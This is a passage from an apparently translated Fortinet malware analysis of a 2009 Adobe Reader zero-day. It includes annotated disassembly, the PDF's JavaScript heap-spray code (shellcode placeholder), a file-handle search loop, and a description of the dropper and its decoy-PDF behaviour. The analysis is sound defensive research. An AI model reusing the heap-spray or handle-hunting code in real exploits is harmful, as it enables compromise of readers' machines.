.text:009D7884 mov esi, edi ; edi is v_counter
.text:009D7886 sar esi, 3 ; v_counter/8
.text:009D7889 add esi, [esp+1Ch+lp_original_stream] ; pass how many bytes
.text:009D788D mov ecx, edi
.text:009D788F movzx edx, byte ptr [esi] ; read next byte
.text:009D7892 and ecx, 7 ; pass how many bits in the next byte
.text:009D7895 mov eax, 8
.text:009D789A sub eax, ecx
.text:009D789C sub eax, ebp ; ebp is always 1
.text:009D789E mov cl, al
.text:009D78A0 shr edx, cl ; set the lowest bit as the corresponding bit
.text:009D78A2 and edx, [esp+1Ch+var_8] ; var_8 is always 1, so corresponding bit is the DWORD value
.text:009D78A6 cmp [esp+1Ch+arg_C], 0 ; arg_C is always 0
.text:009D78AC jz short loc_9D78BC ; jump
�
.text:009D78BC loc_9D78BC: ; CODE XREF: sub_9D7850+5Cj
.text:009D78BC mov ecx, [esp+1Ch+arg_10]; get the old_DWORD
.text:009D78C0 add ecx, edx ; new_DWORD = old_DWORD + corresponding-bit
.text:009D78C2 mov edx, ecx
.text:009D78C4
.text:009D78C4 loc_9D78C4: ; CODE XREF: sub_9D7850+6Aj
.text:009D78C4 and dl, [esp+1Ch+var_9]
.text:009D78C8 add edi, [esp+1Ch+arg_8]
.text:009D78CC mov [esp+1Ch+arg_10], ecx ; save the new_DWORD
�
.text:009D78E5 mov eax, [esp+18h+arg_10] ; return the new_DWORD
function urpl(sc){
var keyu= "%u";
var re = /XX/g;
sc = sc.replace(re,keyu);
return sc;
}
function xxsc(sc){
var sprdataxx = "XX9090XX9090";
var esprpl=unescape;
var urpled = esprpl(urpl(sc));
var blknum = 0x41000;
var sprdata = esprpl(urpl(sprdataxx));
while(sprdata.length<blknum)
sprdata+=sprdata;
sprblk=sprdata.substring(0,sprdata.length);
scblk=urpled.substring(0,urpled.length);
memory=new Array();
for(x=0;x<1700;x++)
memory[x]=sprblk+scblk;
}
var s = "XXec81XX(此处为ShellCode)
var a=app.viewerVersion;
if (a >= 9) xxsc(s);
else while(1){};
.text:003042DC push offset stru_E886F0 ; lpCriticalSection
.text:003042E1 mov [esp+1Ch+allocate_len], offset stru_E886F0
.text:003042E9 call ds:EnterCriticalSection
.text:003042EF cmp edi, 80h ; allocate_len>0x80?
.text:003042F5 mov [esp+18h+var_4], 0
.text:003042FD ja short loc_30433B ; allocate_len=0x80, no jumping here
.text:003042FF movzx eax, ds:byte_BFD898[edi]
.text:00304306 mov ecx, [esi+eax*4+0Ch] ; get structure pointer which manages all recycled 0x80-length blocks
.text:00304306
.text:0030430A mov eax, [ecx+4] ; the first recycled 0x80-length block
.text:0030430D test eax, eax
.text:0030430F jz short loc_30432F
.text:00304311 mov esi, eax
.text:00304313 mov eax, [eax+4] ; next block
.text:00304316 test eax, eax
.text:00304318 mov edx, [esi-4]
.text:0030431B mov [ecx+4], eax ; take off the first block from the list
.text:0030431E jz short loc_304326 ; how many recycled blocks have been reused
.text:00304320 mov dword ptr [eax], 0
.text:00304326
.text:00304326 loc_304326: ; CODE XREF: acro_allocate_routine+7Ej
.text:00304326 add dword ptr [edx+4], 1 ; how many recycled blocks have been reused
.text:0030432A jmp loc_3043C4 ; exit, return the first block for use
DWORD dwTestHandle=0;
//test all the handles, with step 4.
while (1)
{
dwFileSize = GetFileSize(dwTestHandle,0);
if ((dwFileSize != -1) && (dwFileSize>=0x2000))
{
break;
}
dwTestHandle = dwTestHandle +4;
}
//obtain the self file handlesuccessfully
接着,通过已经获得的文件句柄去找到并执行新的已经嵌入在PDF文档中的ShellCode:
图7:跳转到POC文档中的另一段ShellCode.
另外需要注意的是,这并不新颖。一年多以前“幻影军团”曾经使用“查找并执行ShellCode”的方法在一个恶意的PDF文档中。
新的ShellCode会执行以下动作:
1).从初始PDF文档中生成一个可执行文件并执行,这实际上是被我们的杀毒软件检测出来为“W32/Protux.GK!tr”的病毒。
2).从初始PDF文档中生成一个正常的PDF文档,并使用Adobe Reader 打开并使用同样正常的文档内容覆盖当前打开的恶意PDF文档:以取得完美的伪装效果。从结果来看,伪装文件的名字为:“The question of the charter of pro-democracy moment.pdf”,存放在系统Temp目录下。
接下来是关于新ShellCode的关键点。
图8:第一步在Temp目录下生存exe文件
图9:第二步执行生成的exe文件
图10:第三步生成伪装的PDF文档
图11:第四步用Adobe Reader 打开伪装的PDF文档
结论:
回头看这次0day攻击的整个过程,每一个部分不管是漏洞触发,开发利用,漏洞背后的逻辑关系,促使改变漏洞还是最后的ShellCode都是相当有技巧性的。
这个漏洞利用程序通过堆喷射的方法也会在将来的Adobe Reader漏洞用到,特别是它自身的创新。
FortiGuard已经发布了FGA-2009-35公告来应对这个问题,这与Adobe的安全公告:APSB09-15相一致。对我的客户来说高级0day保护已经是可以使用的了从2009-10-9。
当我们的杀毒软件检测到PDF利用程序为“W32/Protux.GK!exploit”并且生成的可执行文件为“W32/Protux.GK!tr”时,IPS会以“Adobe.Reader.Decode.Color.Remote.Code”标示出。
我们再次建议 Adobe Reader 和Acrobat尽快升级应用程序到最新版本。
Disclaimer(以下为一些免责声明及公司简介,与技术无关,故不作翻译,译者注)
Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy
or completeness of the information. More specific information is available on request from Fortinet.
Please note that Fortinet's product information does not
constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified as such in a duly signed writing.
About Fortinet ( http://www.fortinet.com/):
Fortinet is the pioneer and leading provider of ASIC-accelerated unified threat management, or UTM, security systems,
which are used by enterprises and service providers to increase their security while reducing total operating costs.
Fortinet solutions were built from the ground up to integrate multiple levels of security protection--including firewall, antivirus,
intrusion prevention, VPN, spyware prevention and anti-spam -- designed to help customers protect against network and content level threats.
Leveraging a custom ASIC and unified interface,
Fortinet solutions offer advanced security functionality that scales from remote office to chassis-based
solutions with integrated management and reporting.
Fortinet solutions have won multiple awards around the world and are the only
security products that are certified in six programs by ICSA Labs: (Firewall, Antivirus, IPSec, SSL, Network IPS, and Anti-Spyware). Fortinet is privately
held and based in Sunnyvale, California.